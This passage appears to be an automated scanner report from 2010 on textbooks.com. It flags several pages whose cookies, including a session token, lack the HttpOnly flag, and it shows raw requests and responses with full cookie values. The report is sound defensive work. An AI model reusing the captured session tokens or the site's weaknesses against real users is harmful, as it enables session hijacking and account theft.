If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute in the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.textbooks.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application (see the Set-Cookie headers in the response below) and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IUNU%2FCVo3e7OAi3monE7uCKuNyCjn5xqOcaCW%2FojlApqnsXvSUcUMOZl%2Fl8xqqJr9Y3Dw8PP2JICBiWM7Ak%2BHP9rNIzm%2FMoylv%2FVwIAvI140oSpVSBxpIYvn92zyqpwSPPrcGtTaexBsW5Chmrif7zJaJoACHS2EIIySIqSt2I0NV8n6nnhIPVo8RX%2FrUG2RBrQHWwa0R19c009fjgbYxmyPo%2B5NOetV8THje7FeH13zQI39TXIB9TIyBHQ1EB%2BXWVXQac0Ey45mygp%2Bt7iYST4atUOq%2Fl3U44mEfbjIRjKtyI1D%2BiXOv9w5IZLdyvQZjOnzlUvwem93ygYrsFZW5%2FjvekOHJEznxLWsbtI4zRDPLJZ66QRiax%2FUhM9TxI7Xf0lZ5L%2F10lsV7GmSA4J25Z1gGeA928TgjRf2T63g80GqRaftVJIA%2FHBd9QzmkHN%2FKa%2ByoG4hkOrtT2hOEaKk6Ke6Rj27ja%2BdHdb0GNwnZPZE1m5xvH5SZVFXHwBzTMv1BREEsKcH%2B0mWwEZ3faoX8ra5YYektLjd%2BnRRsiopnGuR2xNXAACIXxWM672Qarg82sA1Fesrsho3iH22CDsDaKzDZ3B0oF%2FJ%2FaiFWbkfgelNPYjkfOQ4sqgctsGj7%2FK1lub%2FdkTrgB5oX%2FemQDN53IOQAxOhT7OGDhDp%2Bt%2B1CL0ohB%2B4hN9Vye%2FHFzmjXj6v5r3L9GF24tjgLNgDc%2FthzEZHZrxBdWtHozBVeAaZHgKq2WQ8Et5pELcH8OR%2BaqH%2F6BEMH1NIsd9T9%2Bau52CbsvVuOVsXJuhbBFT4okHAFCKjUFtlFrqfP9ykwm0uU71U2eajIphvFjf5X%2F9qtHeimMNXB8MhOYfOJRTJ01R%2FuSqw%2B245%2BAYRvEGBePAT%2BNnXSLXzIhg1cMqYrmQED%2BFpNjdu7eIgMaByUCXYhYHTrpoKhnPZAV5%2FuevXai0LvCMC1QjNWN4e8EA788UJBDoacNBhtUTF1%2BFMUrf6hvzZ51cjKf%2FUrQ3U7TgH9hux7bP3D6ZdSNv3FJKyprgWHoHR4x82%2BiDXUckV42NLHqWtt9ki4EFpJN2PGZxxEVeMkakM9da9HHZDo%2BU4Lg5J%2FaZJ2aEDRyg8o4R9rmdnDC4WtwQ54hev%2FWEMylzZNyqIOqPjsyY2LrB3Akg0Xd3maRkS8%2Fs9Au3VfJ8SJnOLJoZVzmIaaL%2Bv2Pj5pIIhWLkUmR04UQ%2Fza3XsvHyiP0ryCWvhE4SwyTOBBkCL6PvopHc4qfH0cCTmYwqL7opoI6Q%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=O7IQMANG3VCTdpnhVXo%3D; expires=Mon, 26-Dec-2011 13:51:59 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.2. http://www.textbooks.com/Author/Peter_Vorderer.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The following cookies were issued by the application (see the Set-Cookie headers in the response below) and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Author/Peter_Vorderer.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=H01U36MSp2dZuiYXGjisaivMdUBgZaLhl4%2FnJGGLIw0eZsY%2BGwK8RLrTb0Mn7MlBojEDK1pCuEjD%2F4SI1V9tIZrtItqjVkwmuFxeNkXpLLphXwnqkLiewlO0zWNUBkZlheVezHXMZgLZQPEWG3uJFdFa3R4AaBmosszdTLbwSBeRufTyT7DmLHTmY5h6yDHjYtt9JPgoWW%2FdSnKXM5u6A%2Fmt5dpfuTcdZfhJZA4rRlDnz9vC64xjS%2FPUCLqvzcw2TSUoiwIX1WvWuTj6hZY3d8TPab0WekS2SMiB7c9KOZyuMA9rj9ruOpqDfOtb7FiwqPIuR7izBEvzhlkQibRlyYgD4xTcLczw5s4y6SdQa%2F5Y%2FMSdfq9y%2BlT8EdOSPVEFadz%2FZkz845z0jGCXfRvlQb9ey0nqEPZerPKAXaIQLq1eNTMm5k9fzdLUX4Z9AAbLP9rYik51SDvDcnT7QO6VgSwypJVzXF42pZsH16snj3Ir4DnTmfHkJ9XdOLa%2BASkH6jqLSjeR0uxlVn46oNiDql7qqsU1TlHw2uNhppz8tb7oP1k%2FyH0W5bm1%2FDYOPHSIfMc4XUcb3f4K6i5t6FKQ2Tv0jiPt76gJBjd3WvIPTrcFpbBVTcVSu7Qd4G5uq%2FQMzl7heE3aBbybUdd68hi3MwSdKlg2g%2BQBIp%2FEV%2B0hZNa3akd7Lcag7Rp9Yy%2FHSkg2efBneciWE5914OiJ5sXY874FeMSVGnZrMoVvoztI3T5RlxjY9lZ5c4aQ3Q4W5D6t3uW911wm10TGCKjQxdujRHUFOSNFmQoj0CGYVcObVqLQFJ4S7vQrbI%2Ffdloa5%2B1NpgMYC5ixSIG4e6N7BqyT97eESy8SEA3j%2FJd%2F4OX1BXmHG58Q74HA8NTsKLrIgiolu871V9eSwRT7J6fGx54s%2BtKQP1r5ma0z1xFYcGyzaztJaPwBXtDCWrXqjZ9AexjzaIE5GLWoo7bf0yAIlFjWiVLnX2FPyxKOcxJE3hP%2B%2FVe76wnw2DHFPjNKbzLGUdJwBRdhV4jSaYdtscek5Ei4058GEgjJieD4NTiFL97OuABKvt0pBc0cRTBH6rbzLmVnr46QCPHLgLxBFOBXgDUUxDKYGlBnppd5bSMp3a0wgyYHuRd%2BPl1PWlRO8761qzLi5maBr%2BIM9eh2%2B4cfNshfqxPP5bO2NXqaEkF179xjjC5LpJZIrrlhBNkEcmab4qfvz6XhhMkl6PO3flcm9JSwxSBzGJNKcf1Wkyh2U7HuJbBJtYzN9xU6Tv%2BT4Pc%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=C0ot1rm4AVmqgN2OAk8%3D; expires=Mon, 26-Dec-2011 13:53:04 GMT; path=/; domain=.textbooks.com
Content-Length: 48376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- START OF PAGE 12/26/20
...[SNIP]...

4.3. http://www.textbooks.com/BooksDescription.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BooksDescription.php

Issue detail

The following cookies were issued by the application (see the Set-Cookie headers in the response below) and do not have the HttpOnly flag set. Several of these cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BooksDescription.php?BKN=756724&SBC=CB0&mcid=XCS-Become-9780805853223-U&utm_medium=shoppingengine&utm_term=9780805853223U&utm_source=become HTTP/1.1
Host: www.textbooks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:21 GMT
Connection: close
Set-Cookie: BNG=deleted; expires=Sat, 26-Dec-2009 13:44:19 GMT; path=/
Set-Cookie: 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; expires=Tue, 25-Jan-2011 13:44:20 GMT; path=/
Set-Cookie: TBSESSION=JrxP960N4HQ7mADzP1D7yqF0fNX%2BR0clTNCcjEKeryEMxNgKFUiFfkJvGOkcESM4s6u2M9wn4Mp0eRxMk2zoO7gpAukCPAS47mKQ7RdsfA6qfnrndZzf40lVm5GwdoII1X%2FOU6gdYzFRpWRB72Nh2BnyY77V7GlCiIC740scKoPvcPhyClreKV%2FjFSfPbdPqRfrQIBVLVKbto66IzMi6Mu3h%2FcDrsNX5UudWvpdhNY5%2Bncv%2F3CGwzVpwrbWcvpYK%2FKEubIHcYREUgPGOaTiojy%2FzUQ5bVgATj5FVT%2FTggUeshMviDyO8%2FDi2u4i4WZXO37DRyxznP7W1AxSZMCbtdz%2F6leTHX25wztUnoW5v6PxdgaKOgvHoy8zT26FS1ub4D9yxxpu4RrCJCxpEtfckl4TaucHvWO8QetcLcTp58oqeH0kUQ0aftAWwWK9zgJ1%2FwxNppv63COoFEfLhXopwvkWAyPmrJnDadLs91HLXpfaEvPBxOeAMXAmaP6wvZd0Rutsh7ubiGuFDbfsQcnRXckp3Zv4dBZsXrQq%2FAR6oX9jY762kpGuBc%2Fzig8kEdzmoIr6ppRreuRZflmL8KLLYOI%2B5s7dZ915IMDlggsZX4x1AD90Te%2BdaYyA73n%2Fm%2F1JGY283ScqT1f3fb80S8M6QEhgTEGa5LuNLs7S9ZSIQUGje4CYjCBJhxFI7uvkERtdhpoAxBfflkxVFj9xgQu0k2Z0zP24cM42vrPcRirLWAGvu0XPtgwx1YrQTrCBy9vdjdAHgSKzeBSMj2iVkd9aZuxoe8HUCfENbBPaaVFrlSBRCSPoz2X%2FedX%2B%2Fr%2FDmYkSD0D%2B1XybKRtasGTxPpNKp8Up%2Ft1naz8ZzaU5qKJ0OCkv3CKnmKtpTnhVOXiwg8%2FbFpVCNtkIj80WoNu9DEH6xLC4nve%2BcnKGkJVjfBm59WWI%2FxiLbKLojbK5rMoOt1IxpUoEDCajy5tR3u10meUmFUBje4VEWr7MMYmM7DucLesIzbcluQJdVpbBmZLYD2GLQ%2F7LWzgGhPCkj1pFYFtCm7oP3g45E9TZvFomoyJsHA0AVB%2BOF%2FjFPfEDh%2B50F%2BAUTj%2FWcIMn2vB%2BYT5MGse7JqPTvh7rgkKPsDWozH63rLzr6RTK4i%2Fh85gX4%2Ft3RAFxG8LtSmX44znQBBzNc32eNyKjqwj8ZaOpV9gXkK2%2BJhJ6SP3cMOJc%2B96CRisy7mmFSE5odQO5DJNaS5iIs3Brs3B5hjFpsZI7dZg9F%2BJ9w%2FT3qfQlIkUWHsMGOmz0lAbK%2BMyzWAOj9tznYP8QeuQPB6Q%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=mwIrsiZ%2BRpZU9lHz%2BTc%3D; expires=Mon, 26-Dec-2011 13:44:20 GMT; path=/; domain=.textbooks.com
Set-Cookie: TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; expires=Mon, 26-Dec-2011 13:44:21 GMT; path=/; domain=.textbooks.com
Content-Length: 55234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

4.4. http://www.textbooks.com/BuyBack-Search.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BuyBack-Search.php

Issue detail

The following cookies were issued by the application (see the Set-Cookie headers in the response below) and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BuyBack-Search.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
Set-Cookie: TBSESSION=tDL1W8D7gaCS7jzI6Dzjj4VxTEZdKx54wiBKsRJp2y62pibSI8t34OV5LbMNc5J%2BIDh%2F7cXjxIkPCea1HFWQwg4kkvAf5y%2FWIMqnMEOYq5gwfo0nT%2Br3%2B0Mr2U51pNHYBL7L00QV1Pks3Wo83iqXa%2B7yPEmc%2B%2Flgv%2FadwiXTLDJFUr0vnlwokBSjUmrzJgmZryaXHiFLddpXygKYaW023Yg9OSvJi7Hu%2FMNV1OmaPldRr8NvAwN2D0XT49iDMa%2Bf2xtP6Spo7VHCWA6XYz7ITxlt3GaGxxIIo5tXwc5OpTrHqXKdZAdne2jrWU0C9uquUNG68ReG4eYsffCNTtp0n5TG45l11y3WH%2BJEt7bU0WSXGGXcsMXGGjMQO%2BiGd9q7M5Qz3rCO1ddl2dPVIFEGnDI46PKJPARVjZ7nWLgO03rHvHQgwDOpESSmNx6s2uOMe2EUAO%2BEOFsW5KXx7reamIunceN4S%2BcnJTYQ0FH2ipMMSxfFpIidrjTV8mmp0bf7jLgecSzagN1fHJx5fRhv%2BmeNxmxBvAKYx1W3Lrr2iwld3q2%2Fci%2FPFnpICPJNUU22bWGkl8z%2FohGLs8oosTpgzAmuYGE3dpvbdIDYNBpsBJYY8%2Bl%2Bfi0gbtnbrbxa1vAkZh04aZMtNdXM8EfztGRlpwB%2B5UN1%2BleUU7v%2FnRvQHz9N48UQiOFcB5WQ3y9rxlRU8erTcckrQ2ok7D4S4tulcBOAuNzSkUak48NLzAEQubR%2BSlReGPs0OFk3ga0Ak8Ie75nTGmuPNwq7iuUuzO1hlxPJkrpdQ%2Be9cdGQRwnrskQvh2JvhGmyj3xPJ7IMFxhV%2Ftdv%2BKn62YFQ50%2FVDLanFjHYkhhICDrnx1gf0b%2F14Sh0tZPSmceYUkEjlZreJ3mdp80vc8jooDDhCSXpeJO0OUyhzaXX%2FrptrGcvsef07pvCuUku%2FuJZxotQmum0fs7Lpsg3%2FTiPv0lEeieSUA%2FFMlJxy%2BiCrl4cD23thJbSkwqHTKthbb9oXiViEvHpLerRSsI4XSIuUWaE2IUurstFcJkUY7ng4MGWzRUSDioyeDe3MFN0qlXJxlPhOgjHsM%2BeLri8m%2BBvkXPnMsnozg7j6h1J0BVLRtD7kvlRtQpJ76xS1r0GGMb4cmhZcd%2BrrvLN8CK%2FXqu6P6aQt6T9m7DlM68gUlh%2FR1uSHpCMBltVrtitvz4kN95S8TT9BFfJEEnu%2FnImW0wLUwiQRhHxs20WtHAuk4vQoQYH4MjtdFs3sQVmMcQ3T8UDSK2r2JU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=0COxkJ9ZgoIrUuXJTYo%3D; expires=Mon, 26-Dec-2011 13:53:02 GMT; path=/; domain=.textbooks.com
Content-Length: 35930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.5. http://www.textbooks.com/Cart.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The following cookies were issued by the application (see the Set-Cookie headers in the response below) and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Cart.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
